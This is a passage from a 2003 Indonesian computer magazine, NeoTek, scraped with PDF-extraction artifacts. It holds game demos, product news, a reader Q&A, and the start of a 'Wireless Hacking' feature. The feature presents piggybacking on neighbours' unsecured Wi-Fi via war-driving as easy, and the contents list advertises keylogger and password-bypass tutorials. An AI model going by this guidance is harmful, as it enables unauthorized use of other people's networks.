neotek vol. iii - no. 08

51
NeoSoft Reaksi pembaca atas dimuatnya game pada NeoTek III/5 Mar/Apr 2003 sangat  jelas. Pembaca tidak menginginkan ‘game anak-anak’ melainkan game  yang ‘serius.’ Itu sebabnya mulai nomor ini NeoTek menyajikan game ‘serius’ atau demonya. Selain Mutant Storm dapatkan pula Roller Coaster Tycon 2, Jurrasic Park: Project Genesis, dan WarCraft III: Reign of Chaos. Semua adalah playable demo yang cukup menantang untuk dimainkan sebelum memutuskan untuk membe- linya atau tidak. Neoteker juga perlu hiburan,  kan? Mutant Storm Mutant Storm dan Game ‘Serius’ Lain dan Game ‘Serius’ Lain Mulai sekarang anda bisa mendapatkan ‘game serius’ atau demo-nya Iklan VisionNet

Upload: ma-rody-candera

Post on 30-May-2018

274 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 1/50

NeoSoft

Reaksi pembaca atas dimuatnya gamepada NeoTek III/5 Mar/Apr 2003 sangat jelas. Pembaca tidak menginginkan‘game anak-anak’ melainkan game yang ‘serius.’ Itu sebabnya mulai nomorini NeoTek menyajikan game ‘serius’atau demonya.

Selain Mutant Storm dapatkan pula

Roller Coaster Tycon 2, JurrasicPark: Project Genesis, dan WarCraftIII: Reign of Chaos.

Semua adalah playable demo yangcukup menantang untuk dimainkansebelum memutuskan untuk membe-linya atau tidak.

Neoteker juga perlu hiburan, kan?

Mutant StormMutant Stormdan Game ‘Serius’ Laindan Game ‘Serius’ Lain

Mulai sekarang anda bisa mendapatkan ‘game serius’ atau demo-nya

Iklan VisionNet

Page 2: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 2/50

Mei/Jun 2003 NeoTek 1

HomePage

Salam!Salam!

eralatan wireless networking semakin murah dan

mudah didapat. Namun antusiasme penerapanwireless LAN tidak sejalan dengan security-nya.

NeoTek menunjukkan, dalam topik Wireless Hacking, betapawireless LAN yang seperti ini membuat sistem jaringankomputer semakin tidak aman saja.

[email protected]

 W  W ireless Hacking:ireless Hacking:Mudahnya ‘Nyantol’ WLMudahnya ‘Nyantol’ WLANAN

PP

• Browsing Internet ke seluruh dunia dengan meminjam akses Internet broadband  milik tetangga. Itulah kegiatan ‘nyantol’ akes Internet yang semakin mudah

dilakukan secara wireless.

Bagaimana menghubungi NNEEOOTEK?TEK?KONTRIBUSI [email protected]

SURAT [email protected]

 WEBMASTER  [email protected]

PEMASARAN

[email protected] DI DALNET#neoteker

ADMINISTRASI IKLANTel. 021-5481457 Fax. 021-5329041

SIRKULASI NEOTEK Tel. 021-5481457

ALAMAT REDAKSIGedung Cahaya Palmerah Suite 503 Jl. Palmerah Utara III No. 9 Jakarta 11480

MILIS PARA NEOTEKER http://groups.yahoo.com/group/majalahneotek 

amkm

andameminta

kamimendownload

Software gratis

di Internet?

Kami dapatmen-download-kannyauntuk anda.

Kirimkan email ke:[email protected]:

• Subject: amkm• Isi pesan: Mohon download-kan

[ nama software] dari[www.blablabla.com]

 Tapi besarnya...50Mb... 200Mb?

sa—elephantsa—gajah

Page 3: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 3/50

2 NeoTek Mei/Jun 2003

Daftar Isi

Daftar IsiDaftar Isi

NeoTNeoTek Vek Vol. Iol. III I No. 8I No. 8

‘Nyantol’ WLAN Menunjukkan mudahnya‘nyantol’ Internet access

orang serta menyelinap langsung ke balik NAT proxy! 

10

WLAN SecurityTerdapat jurang yang lebar antara penerapan WLAN

dengan security-nya. Sebagian besar access point terinstal tanpa menerap-

 kan enkripsi, sehingga setiap orangdapat dengan mudah terhubung(associate) dengan access point 

tersebut.

Situs NeoTekwww.neotek.co.id

neotek.kpone.com.sg Jadikan situs NeoTek sebagai pangkalan Anda berselancar 

Link LangsungKunjungi situs-situs yang dibahas di 

 majalah NeoTek dengan sekali kliklewat situs NeoTek.

NeoTek versi PDFKehabisan NeoTek di kota Anda? Dapatkan saja versi PDF-nya. Gratis! 

Download

Tersedia juga download di situsNeoTek selain dari situs aslinya

Layanan Rupa-rupa NeoTekPerlengkapan berinternet dari situs NeoTek

Channel #neoteker di DalnetNgobrol ramai-ramai sesama NeoTeker 

Web Chat RoomKini tidak usah jauh-jauh untuk ngobrol langsung dengan sesama NeoTeker 

Mailing ListIni yang paling ramai. Segera ikutan

 berbagi pengalaman berinternet! NeoTeker Official Portal

 http://neotek.portal.dk3.comSitus komunikasi antar Neoteker.

NeoStartNeoStart

NeoRNeoRevieweview

NeoTNeoTutorutorWireless Hacking

 Membandingkan wired-LANdengan wireless LAN dan me-

 ngapa WLAN lebih rawan penyusupan

7Borland Delphi 7Personal EditionProgramming tool yang power-

ful namun juga mudah digunakan. Da-

 patkan lisensinya, gratis, dari Borland.

28

Go Wireless: GPRS Jangan cuma pakai handphoneuntuk SMS/MMS, gunakan juga

 sebagai modem untuk komputer anda.

45

Go Wireless: Wi-Fi/LaptopKalau berada di kawasan hot 

 spot, laptop dengan WNIC da- pat dipakai untuk browsing.

Go Wireless: Pocket PC hp iPAQ memang standar, tapi  kini ada juga Toshiba e740

 yang full-wireless, selain juga Linux- based PDA

47

Xnuxer Linux:

Distro Linux Satu DisketLinux mini-distro hasil karya

 putra Indonesia. Cocok untuk mulai  belajar Linux tanpa merepotkan partisi.

48

Google HacksGoogle pun bisa diutak-atikuntuk mendapatkan manfaat 

 yang sebesar-besarnya.

43

Memahami WarDialIstilah war driving berasal dari 

 kegiatan hacking di awal-awal 

 masa Internet, yaitu war dialing, yang

 setara dengan scanning. Hanya ini 

 men-scan telepon bermodem.

ToneLoc & THC-ScanDua wardialer klasik yang ma-

 sih layak dipelajari sampai se-

 karang. Asah keterampilan DOS anda.

12

14 Delphi Tweaking ToolBelajar Windows security 

 sekaligus belajar membuat  program dengan Borland Delphi 7.

30

C++ WorkshopMembuat keylogger Tip programming C++

dengan bahasan keylogger.

Objek pada JavaScriptBagian terakhir mengenai 

 sub-bahasan obyek buatan

 sendiri pada JavaScript.

34

36Metatag untukPromosi SitusPahami cara kerja berbagai 

 macam search engine untuk dapat me-

 manfaatkan mereka sebaik-baiknya.

Saran praktis dari praktisi yang juga

 pengajar sertifikasi webmaster.

38

Ad-Hoc Mode danInstalasi Access Point

 Akses wireless dapat dilaku- kan dengan atau tanpa access point dengan biaya minimal saja.

8

NeoStyleNeoStyle

46

16

Page 4: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 4/50

NeoSoft

NeoProfil

NeoTek Jun/Jul 2003

Wireless DeviceProgramming

 Java kini diposisikan sebagai wirelessdevice programming tool, baik de-

 ngan J2ME maupun dengan UIQTechnology pada Symbian OS. Mari 

 belajar membuat program untuk handphone anda.

Memahami NokiaRingtoneNokia ringtone menggunakan bahasa

 pemrograman sendiri, yaitu RTTL yang dapat dikonversi ke keypress maupun ke notasi balok. Asah bakat  musik anda dengan Nokia.

MutantStorm0

Kru NeoTekBermarkas diGedung Cahaya Palmerah 503

 Jl. Palmerah Utara III No. 9 Jakarta 11480

 Telp. 021-5481457Fax. 021-5329041

BankBank BNIa.n. PT NeoTek Maju Mandiri

No. rekening 070.001709720.001Bank BCA KCP Rawamanguna.n. Aswan BakriNo. rekening 0940544131

Pemimpin UmumFachri Said

Pemimpin RedaksiKosasih Iskandarsjah

Redaktur AhliOnno W. PurboMichael S. Sunggiardi

Pemimpin UsahaFahmi Oemar

Ridwan FachriRedaktur PelaksanaGianto WidiantoDadi Pakar

Sekretaris RedaksiMarni

Dewan RedaksiDavid Sugianto, Albert SiagianAsmuri Anwar, MA Rody C.

Webmaster Supriyanto

PemasaranHedhi Sabaruddin, Denny 

 Tuti Sundari, Arinto

Iklan dan PromosiHedhi Sabaruddin

KeuanganAswan Bakri

3

6

4

5

Diangkat dari cerita klasik RoboTron ,

 permainan ini benar-benar 

untuk pencinta action. Versi demo ini terdiri dari 9 level.

NmN

Neoteker menjawab Neoteker

Klak Klik Bukan Mainan Anak Windows Server 2003Centrino Mobile Technology 

802.16: Alternatif terhadap Cable dan DSLBroadband

GPRS: Evolusi GSM 2G ke2.5G

NeoRagam

Inbox

44 Daftar Isi CD NeoTek 

Mei/Jun 2003 NeoTek 3

FOKUS BULAN INI

Wireless Hacking

Mudahnya Nyantol WLAN Orang

Wireless Hacking

Mudahnya Nyantol WLAN Orang

NeoTNeoTeknoekno

Poledit: Password Policy Membahas salah satu policy  penting, yaitu password policy,

 serta hubungan policy dengan regedit.

WWindoindows Securityws Security

18

Policy On/Off dengan VBScriptRegistry tool dapat dibuat hanya

dengan VBSCript pada halaman web.

22

Bypass LaranganRegEditRegedit di-nonaktifkan orang

lain? Bypass dengan membuat registry 

file khusus untuk mem-bypass-nya. Jugadibahas cara menjebol login password  maupun melumpuhkan poledit.

24

MS Baseline SecurityAnalyzer Repot meng-update dan mem-

 patch Windows security? Kini ada MBSA yang memudahkan pekerjaan anda sebagai admin jaringan.

26

Policy pada Windows 98 Membahas policy sehubungandengan Windows Explorer, men-

cakup menampilkan/menyembunyikandrive pada tampilan Windows Explorer 

 serta menyembunyikan regedit.exe itu sendiri yang digunakan untuk mene-tapkan policy pada Windows.

20

FOKUS BULAN INI

Daftar Isi

Page 5: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 5/50

4

NeoRagam

BUKAN MAINAN ANAKNeoTek kena protes karena memuat ‘game anak-anak.’ Memang game sekarang bukan lagi mainan anak-anak, seperti playable demo bebe- rapa game populer yang dimuat di 

CD NeoTek kali ini.

Roller Coaster Tycoon 268.41 MB

Belajar mengelola bisnistaman hiburan. Siapa tahunanti bisa menjadi peng-usaha theme park suksesmenyaingi Dunia Fantasi.Pentium 300, RAM64

 WarCraft III:Reign of Chaos99.8 MB

Role playing strategy game yang menggabungkan indi- vidual combat maupun stra-tegi untuk menaklukkanmusuh.Pentium 400 RAM128 8MB videocard, DirectX

 Jurrasic Park:Operation Genesis78.23 MB

Rancang dan kelola dinosaurtheme park yang masih da-lam pengembangan di Blue

 Tongue atau bertempur da-

-lam 12 jenis misi melawankekuatan alam maupunmakhluk luar biasa.Pentium 600, RAM128

Klak Klik

khir April 2003 (US)dan pertengahan Mei2003 (Asia), Micro-

soft meluncurkan produkterbarunya, Windows Server2003, yang dibentuk dari pe-ngembangan Windows 2000.

Pada setiap versi WindowsServer 2003 terdapat IIS 6.0web server yang kini lebihsecure. Default installationpada IIS 6.0 adalah lockdown.

Ada empat versi WindowsServer 2003:Standard Edition,Enterprise Edition,Datacenter

Edition, dan Web Edition.Standard Edition mendu-kung file dan printer sharing,

secure connectivity, dan cen-tralized desktop applicationdeployment.

Enterprise Editionmendukung sampai 8buah prosesor atau mesinItamium 64-bit, eight-nodeclustering dan mendukungmemori sampai 32 Gbyte.

Datacenter Edition adalahversi paling powerful yangmendukung RAM 32-bitsampai 64 Gbyte, 64 buahprosesor, dan 512 GbyteRAM 64-bit. MencakupWindows System Resource

Manager untuk memfasili-tasi konsolidasi dan systemmanagement.

WebEditionadalah produkbaru di jajaran Windows Ser-ver yang dirancang untukpengembangan dan hostingweb application,web pages,dan XML web service.Dirancang khususnya untukbekerja bersama IIS 6.0 dandengan mudahmengembangkan XMLapplication menggunakanteknologi ASP.NET.

BARANG BARU... BARANG BARU...

AA

 Windows Server 2003

Centrino ada-lah chipset bun-dle keluaranIntel yang ter-diri dari prose-sor Pentium M,suatu chipset,

dan Wi-Fi chip. Pentium M wa-laupun hanya 1.6GHz, namunkinerjanya melebihi Pentium 42.0 GHz. Malah kinerja PentiumM dapat disamakan denganPentium 4 2.4 GHz.

Pentium M lebih hemat energi,tidak banyak menghasilkan pa-nas, sehingga laptop yangmenggunakan Pentium M akandapat memanfaatkan bateraisekitar 4 sampai 4,5 jam, diban-dingkan biasanya yang 1 sam-pai 1,5 jam.

IBM Thinkpad T40IBM Thinkpad T40 merupakanlaptop terbaik yang ada seka-rang ini. Selain menggunakantitanium casing seperti semuaThinkpad seri T, IBMThinkpad T40 memanfaatkanIntel Centrino chipset bundle.

Perbedaan yang langsungterlihat pada laptop tipeterbaru dari IBM ini justrubukannya teknologi IntelCentrino-nya, melainkanhilangnya port-port

tradisional yang biasaada padakomputer.Andatidak

menemui lagi PS2 maupunserial port, melainkan USB 2.0,IrDA, parallel, dan video/S-video output.

Berikut adalah spesifikasi IBMThinkpad T40:

Prosesor Pentium M 1.6GHzRAM 512MB (max. 2048MB)

Harddrive IDE 80 Gbyte

CD/DVD CD RW/DVD ROM

Display TFT max. 1400 x 1050

Colour 24 bit (16,7 juta warna)

Video/audio RAM 32MB,ATIMobility Radeon 9000,sound card

Network Modem 56kbps,10/100/1000 Ethernet,Wi-Fi, Bluetooth

Expansion 2 (1 free) memory slot

Connectivity 2 USB 2.0,1 IrDA,1parallel,1 Video/S-video

Software Windows XP Professional

Harga SGD4000

Dell Latitude D600

IBM Thinkpad T40 terlalu ma-hal? Pertimbangkan alternatif dari Dell Latitiude D600 yangselain penampilannya jauhlebih elegan untuk keperluancorporate, juga menggunakan

Intel Centrino chipset bundle.Prosesor Pentium M 1.6GHz

RAM 512MB (max. 2048MB)

Harddrive IDE 40 Gbyte

CD/DVD CD ROM

Display TFT max. 1400 x 1050

Colour 24 bit (16,7 juta warna)

Video/audio RAM 32MB,ATIMobility Radeon 9000,sound card

Network Modem 56kbps,10/100/1000 Ethernet,Wi-Fi, Bluetooth

Expansion 2 memory slot, PC card

Connectivity 2 USB 2.0,1 IrDA, 1 paralle

Software Windows XP Professional

Harga SGD3500

Centrino Mobile Technology 

NeoTek Mei/Jun 2003

Page 6: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 6/50

Mei/Jun 2003 NeoTek 5

NeoRagam

khirnya muncul jugaharapan pada rakyat

banyak untuk dapat menik-mati akses Internet broad-band murah. Harapan itudatang dari standar teknis802.16 yang promosi adop-sinya dilakukan WiMAX(World Interoperatibilityfor Microwave Access).

WiMAX, suaiu lembaganon-profit keanggotaannyaterdiri dari perusahaan-per-

usahaan terkemuka sepertiNokia, Ensemble, Intel, danFujitsu.

Standar 802.16 memung-kinkan broadband accessdari jarak sampai 30 mildengan kecepatan sampai70 Mbps. Ini artinyamemungkinkan menyedia-kan akses Internet broad-band ke daerah-daerahpedesaan yang sampai kinisecara ekonomis tidak di-mungkinkan oleh Cableatau DSL.

Biaya pembangunan net-work 802.16 hanya separuhbiaya memasang jaringan

T1. Ini merupakan peluangbagi perusahaan-perusaha-an telepon untuk memper-luas pelayanan broadbandaccess-nya sampai ke pede-saan. Kelak akan ada tigacara untuk menyediakanakses broadband untukumum: DSL, Cable, danWireless Broadband denganprotokol 802.16.

Penyedia wireless Internetaccess jarak jauh ini bisa sajaadalah para penyedia hot spot(wireless access Wi-Wi pro-tokol 802.11) yang juga

menggunakan peralatan ber-standar 802.16 untuk mem-

perluas jangkauan pelayan-annya.

Harga modem 802.16 masihmahal (USD1000) diban-dingkan dengan wirelesscard (802.11) yang sudah dibawah USD50. Diperkirakantidak lama lagi modem 802.16ini akan turun sampaiUSD300.

Sebenarnya WiMAXmempromosikan teknologiyang sudah ada sejak 5 ta-hun yang lalu, namun padawaktu itu masih dianggap

belum siap untuk diaplika-sikan secara massal.

istem telepon selulargenerasi pertama meng-

gunakan sistem analog. Ma-sih ingat dengan sistemAMPS?

2G Mobile Phone

Sistem telepon seluler yangkini paling banyak digunakandi seluruh dunia, yaitu sistemGSM termasuk dalam tele-pon seluler generasi keduaatau 2G

Setelah GSM, teknologi 2Gyang kedua populer adalahCDMAone (dulu dikenalsebagai IS95a) dan banyakdigunakan di Amerika sertaKorea. Di Jepang teknologi2G yang dipakai lain lagi,

yaitu Personal DigitalCellular (PDC).

Pemanfaatn GSM yang po-puler justru bukan fungsisuaranya, melainkan fungsiteks (SMS) menggantikanpopularitas pager belasantahun yang lalu. SMS kiniberkembang ke MMS (mul-timedia message system)pada telepon seluler denganfasilitas GPRS.

2.5G Mobile Phone

GPRS dikembangkan dariGSM dan dikenal sebagai2.5G mengingat dengan

GPRS relatif pemakai te-lepon selular sudah dapatmengintegrasikan suara,Internet (masih narrow-band), dan multimediamessage (MMS) walaupunbelum multimedia service.

Pemakai telepon selulerCDMAone seperti di Ame-rika justru tidak mengenalSMS apalagi MMS.

Adapun telepon seluler ge-nerasi ketiga atau 3G akanmenggabungkan suara, In-ternet, dan layanan multi-media seperti video-on-de-mand pada telepon seluleranda.

Telepon seluler 3G akanmenggunakan teknologiCDMA2000. Sistem 3G di-definiskan oleh ITU (Inter-national Telecommunica-tion Union) sebagai IMT-2000 dengan kemampuanmenangani akses data 144kbps sampai 2 Mbps.

Sebenarnya dengan GPRSbanyak fungsionalitas yangingin dicapai dengan 3G da-pat diberikan oleh 2.5G, na-mun teknologi GPRS sen-diri tidak dinamakan 3G

sebab menggunakan stan-dar yang sama sekali ber-beda dengan standar ITU,yaitu standar yang dikem-

bangkan olehpara operatorGSM sendiri.

3G Mobile Phone

Setelah NTTDoCoMo me-

lakukan ujicoba 3G sejak2001, kini sa-ingannyan,KDDI, melun-curkan tekno-logi 3G. KDDImeluncurkanlayanan 3Gsejak April2002 di JepangmenggunakanspesifikasiCDMA20001x dengan kecepatan aksesdata 144 kbps. Jepang kinimerupakan pasar teleponseluler paling maju di dunia.

Namun tampaknya perkem-bangan 3G di luar Jepangterhambat. Selain karenamahalnya membangun in-frastruktur untuk sistem3G (juga mahalnya lisensiCDMA yang dilelang masing-masing pemerintah suatunnegara), juga karena suk-

sesnya teknologi GPRSyang memperkaya tekno-logi GSM dan dikenal se-bagai teknologi 2.5G ini

Hambatan lain dari peneri-maan pasar untuk 3G ada-lah makin populernya Wi-Fi, yaitu wireless Internetconnection menggunakanprotokol 802.11. Walaupunsebenarnya Wi-Fi dan 3Gmembidik pasar yang ber-beda. Anda bisa membawahandphone ke mana-manasetiap saat, tapi tidak laptopke mana-mana, bukan? Tapibagaimana apabila kemam-

puan PDA yang semakinseukuan handphone sema-kin dekat saja dengan ke-mampuan laptop?

BROADBAND CONNECTION UNTUK RAKYAT BANYAK 

802.16: Alternatif terhadap Cable dan DSL Broadband

GPRS: Evolusi GSM 2G ke 2.5G

A

S

GP R S dapat memfungsikan handphoneanda sebagai  mod em

Page 7: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 7/50

6 NeoTek Mei/Jun 2003

Inbox 

Forum ini dimaksudkan sebagai bentuk offline dari mailing list NeoTek di http://groups.yahoo.com/group/majalahneotek .

NmNNmN

Drive Access Control

T: Posted April 21

Ada gak program yang mem-batasi akses ke drive. Misal:harus memasukkan pass-word setiap klik drive D dimy computer. Saya udahcoba folderguard, tapi kayak-nya kurang simple dan gak jalan kalo pake win2K.

Tantan [email protected]

 J: Posted April 21

Ubah ke NTFS dan gunakanRights untuk setiap user, nggaperlu program tambahan.

Albert [email protected]

T: Posted April 21

Gimana caranya convert...Aku udah coba ke controlpanel>admin, tapi disanatidak bisa convert kalo drivec: (system). Saat ini Win2Ksaya pake FAT.

Tantan [email protected]

 J: Posted March 5

Start,Programs,Accesories,Command Prompt,CONVERT C: /FS:NTFS,Enter, Restart.

Albert [email protected]

Uninstall Mandrake

T: Posted April 24

Bagaimana menghapus(uninstal) Mandrake9 danbagaimana menghapuspartisi linux dg partitionmagic (saya memakaioperasi Windows 98 danMandrake 9).Terima kasih

husni_adunk 

[email protected]

 J: Posted April 24

pake pmagic... trus pilih lin-drive nya... pencet tombolkanan... pilih delete... pencetapply... trus buting dehklo mo ngilangin lilo/grub...ketik "fdisk /mbr"KNSY...(klo nggak salahya...huehehe)

-temenbaek-

[email protected]

Downgrade dari SP6

T: Posted April 2

Saya baru saja upgradeWINNT4 dari SP3 ke SP6,ternyata setelah pakaiservice pack 6 progi BuildingAutomation System (BAS)Jadi tidak jalan.Ada ngakrekan-rekan yang tahuuntuk mengembalikan dariSP6 ke SP3 (downgrade) lagiselain install ulang

Joko Sutrisno [email protected]

 J: Posted April 2

Waktu install SP 6 kan adapertanyaan mau SP lama dibackup atau di timpa.Kalauanda pilih backup,tinggalmasuk Control Panel,Add/Remove dan hapus SP6.

Albert [email protected]

 J: Posted April 3

Sebetulnya versi yang terakhiradalah SP6a (bukan SP6),danitupun masih ada beberapapatches kecil.Coba saja setelahanda install, jalankan WindowsUpdate (Internet Explorer,Tools,Windows Update) dan juga MBSA (MicrosoftBaseline Security Analyzer).

Albert Siagian

[email protected]

Masalah Mandrake 9

T: Posted April 2

Wah lagi2 ttg Mandrake 9.0.Ssetelah dicoba2 lagi, ter-nyata ada beberapa error yangmuncul setelah upgrade1. Setelah pake perintah su,muncul kesalahan :bash: dircolors: command not foundbash: locale: command not found

bash: tty: command not foundbash: tty: command not found2. beberapa perintah com-mand line gak isa diakses:man, clear, shutdown (harusroot, padahal biasanya userbiasa udah bisa), whoami,finger, dll3. beberapa program jugaagak "kaca,” ontohnyaKMail (Icon Foldernya jadihilang)Kira2 ada yg salah padawaktu upgrade atau ada yg

kurang pada waktu upgrade(perasaan sudah semuadiupgrade dech)

Willy Sudiarto [email protected]

 J: Posted April 2

Kemungkinan besar id dandircolors yang berada di/usr/bin tidak dapat di-mountoleh sistem, sehinggafilesystem bentrok dankebingungan' gimana me-

mount harddisk Anda.Untuk mengatasinya, cobalahmasukkan bootdisk, kemudian jalankan dengan mode rescue

dan jalankan perintah chmod700 /usr

Asmuri [email protected]

Hosting PHP Gratis

T: Posted April 4

Gimana sih cara ngedaftarweb hosting di ortland.co.uk

Saya sudah keliling di situsitu kagak ketemu form utkmendaftarnya (yanggratisan)

Bandar [email protected]

 J: Posted April 5

Halo Bandar Cabe,Ini URL-nya:http://www.portland.co.uk/freesubdomainapp.espSekali lagi saya maumengingatkan,kalau buka

account gratis di Portland,ada baiknya mengikuti maillistresminya di:http://groups.yahoo.com/group/portlandfreeweb

Juneman [email protected]

InulLinux

T: Posted April 7

Inul kan emang identik dgpara pekerja TI ;-p apalagi

pecinta Linux kayakpak IMW. Coba cek aja dihttp://inullinux.pandu.org

[email protected]

NeoTeker menjawab NeoTekerNeoTeker menjawab NeoTeker

Page 8: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 8/50

NeoStart

Mei/Jun 2003 NeoTek 7

AMAI-RAMAI WIRELESS LAN SUDAH DIMULAI SEJAK

tahun lalu, dan NeoTek sudah ikut meramaikandengan memuat artikel Onno W. Purbo tentang

wireless LAN di NeoTek II/6 dan II/8 (Maret & Juni 2002).

Pada bahasan kali NeoTek akan kembali membahas dasar-dasar wireless LAN, namun dengan fokus terhadap sisi

security dari wireless LAN. Di sini diperkenalkan istilahwar driving (yang setara dengan scanning pada networksecurity). Dengan war driving anda bisa ikut ‘nyatol’ aksesInternet orang, yang ternyata sangat mudah dilakukankarena sebagian besar penerapan wireless LAN ternyatatidak mengaktifkan fasilitas enkripsinya dan mengguna-kan default configuration.

Membandingkan Wireless LAN dan Wired LAN

Bila anda memahami LAN,maka untuk memahami wirelessLAN tidaklah sulit. Bila pada LAN (wired LAN) anda meng-gunakan kabel untuk menghubungkan perangkat-perangkat,maka wireless LAN menggunakan gelombang radio.

Bila pada LAN komputer yang akan saling dihubungkan

ke LAN perlu dipasangkan NIC (network interface card),maka pada wireless LAN harus dipasangkan WNIC (wire-less network interface card).

Dua komputer yang masing-masing mempunyai NIC dapatdihubungkan satu sama lain menggunakan cross-over cable,maka komputer-komputer yang mempunyai WNIC dapatsaling berhubungan satu sama lain membentuk peer-to-peernetworking. Pada wireless LAN anda tidak usah memusing-kan soal cross-over atau straight seperti pada wired LAN.

Bila lebih dari satu komputer hendak dihubungkan dalamnetwork satu sama lain, maka pada LAN harus digunakanhub dan setiap komputer terhubung ke hub tersebut melaluistraight cable. Pada wireless LAN lebih dari dua komputer

dapat terhubung satu sama lain tanpa alat setara dengan hub.Peranti pada wireless LAN yang setara dengan hub dikenalsebagai access point (AP). Apabila pada LAN jumlah kompu-ter yang dapat dihubungkan ke hub tergantung jumlah portyang disediakan, maka pada wireless LAN, jumlah komputeryang dapat dihubungkan sebanyak maksimum 32 komputer,tergantung pada apakah terdapat interferensi satu sama lain.

Apabila pada LAN koneksi terlindung secara fisik dengankabel koaksial, maka pada wireless LAN yang menggunakangelombang radio 2,4GHz, perlindungan fisik seperti ini tidakada. Setiap orang yang dapat menangkap sinyal wireless LAN,mengetahui SSID (Service Set Identifier) wireless LAN ter-sebut, bisa menakses wireless network tersebut.Apabila wire-less LAN tersebut juga merupakan mekanisme untuk Internetsharing, maka pengakses dapat menikmati akses Internet gra-tis dengan biaya pemilik wireless LAN (‘nyantol’ bandwidth).

Apa yang Diperlukan untuk ‘Nyantol’ Bandwidth

Dengan ‘nyantol’ bandwidth artinya kita tidak memben-tuk wireless LAN kita sendiri, melainkan mengakses wi-reless LAN orang lain. Pada dasarnya alat yang diperlu-kan hanyalah WNIC. Berbeda dengan NIC yang relatif standar, WNIC berbeda fungsionalitasnya satu sama lain.

Untuk mengakses wireless LAN seizin pemilik network,dapat digunakan WNIC merek apa saja. Anda tinggal me-nyetel WNIC anda agar mengenali SSID wireless networkserta listen pada channel yang digunakan.

Untuk ‘nyantol’ masalahnya lebih rumit sebab pertamaanda harus mencari dulu wireless LAN orang yang dapatdicantol. Untuk itu (mungkin) diperlukan WNIC yangmenggunakan antena tambahan, selain WNIC itu harusmampu menjalankan progam pencari sinyal (war driving).

Tidak semua WNIC mampu mengenali war driving soft-ware. Hanya WNIC yang Wi-Fi compliant seperti Lucent’sORiNoCO, Avaya, Toshiba 802.11b wireless card, DellTrueMobile 1150, Compaq WL110, dan beberapa yang lain.

WNIC seperti dari LinkSys, D-Link, ataupun SMC me-mang lebih murah (dibawah SGD100), tetapi tidak dike-nali oleh war driving software seperti Net Stumbler.

Biasanya WNIC yang Wi-Fi compliant ini harganya lebihmahal (sekitar SGD 200), tetapi selain dapat dikenali olehNetStumbler, juga dapat dipasangkan external antennaagar dapat menangkap sinyal wireless LAN yang lebihlemah dan lebih jauh jangkauannya.

Keterbatasan pada WNIC-nya tidak membuat rekan JudhiPrasetyo ([email protected]) putus asa. Secara kreatif iamenggunakan antenna kaleng bekas untuk nyantol aksesInternet tetangga.

‘Nyantol’ WL‘Nyantol’ WLANANWireless LAN dapat digunakan secara lokal maupun untuk 

terhubung dengan ISP. Koneksi Wireless LAN menggunakansinyal radio, yang artinya tidak ada perlindungan fisik

(dibandingkan kabel pada LAN biasa).Setiap orang bisa nyantol bandwidth seperti maling listrik.

R

WWIIRREELELESSS HAS HACCKKIINNGG

• Nyantol WLAN apartemen seberang menggunakan antena kaleng

 yang ditancap langsung pada konektor WLAN USB card.

• NetStumber adalah induk segala wireless

 network scanning tool. Berjalan pada Windows.

Page 9: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 9/50

NeoStart

8 NeoTek Mei/Jun 2003

3 NETWORK NAMEDengan mengklik Edit Profile akantampil window untuk menetapkanNetwork Name. Namakan sajaWorkgroup, disamakan dengan

 workgroup name pada bagian Pro-perties dari Network Neighborhoodkedua komputer yang akan dihu-bungkan lewat WNIC.

ERIKUT INI DIPERLIHATKAN DUA CONTOH

wireless access.Yang pertama ada-lah wireless access antara sesama

komputer yang sudah terpasang WNIC tan-pa melibatkan access point AP. Ini dikenalsebagai ad hoc mode WLAN atau IBSS(Independent Basic Service Set). Keduakomputer yang dicontohkan menggunakan

versi Windows yang berbeda serta jenisWNIC yang berbeda pula (hlm. 8).

Kedua (hlm. 9) menunjukkan instalasi APyang merupakan perluasan dari peer-to-peernetwork yang sudah ada, yaitu dengan jalanmenghubungkan AP pada salah satu portpada router.. Pada dasarnya AP menjalankanWLAN pada infrasturucture mode (dikenalsebagai ESS atau Extended Service Set).

WWIIRREELELESSS HAS HACCKKIINNGG

AD HAD HOOC MC MOODDE WE WLLAN &AN &

IINNSSTTALALAASSI AI ACCCCEESSSS POPOIINNTTMemahami istilah-istilah dalam wireless LAN paling mudahdengan praktek langsung. Disini diperlihatkan caramembentuk ad hoc network antara komputer-komputerdengan WNIC (tanpa adanya AP) serta instalasi APmemperluas wired network yang sudah ada.

B

 WIRELESS CLIENT MANAGER Pada contoh ini salah satu kom-puter menggunakan Avaya GoldWNIC pada Windows 98. AktifkanAvaya Wireless Client Manager dengan mengklik ikon padataskbar. Lalu pilih Actions >Add/Edit Configuration Profile.

BUAT PROFILE BARUBuat profile baru (disini dinama-kan Peer-to-Peer at Cairnhill)dan pilih sebagai Peer-to-Peer Group (ada opsi lain yaituAccess Point dan ResidentialGateway). Access Point untuk koneksi ke AP dan ResidentialGateway untuk ke ISP.

1 2

 Menghubungkan dua komputer yang telah mempunyai WNIC membentuk ad hoc mode WLAN

AD-HOC NETWORK Klik ikon Network Neighborhooddan terlihat dua komputer yangmasing-masing terpasang WNICini, kini membentuk suatu ad-hocnetwork dengan Peer-to-Peer

Networking. Ad-hoc network dapat dibentuk oleh lebih daridua komputer.

6PILIH PROFIL PEER-TO-PEER Apabila profil Peer-to-Peer diak-tifkan maka terlihat Client Mana-ger akan mencari komputer lain

 yang menggunakan WNIC pada workgroup yang sama. Pilih

Advanced > Site Monitor danklik OK

4TERLIHAT KOMPUTER LAIN

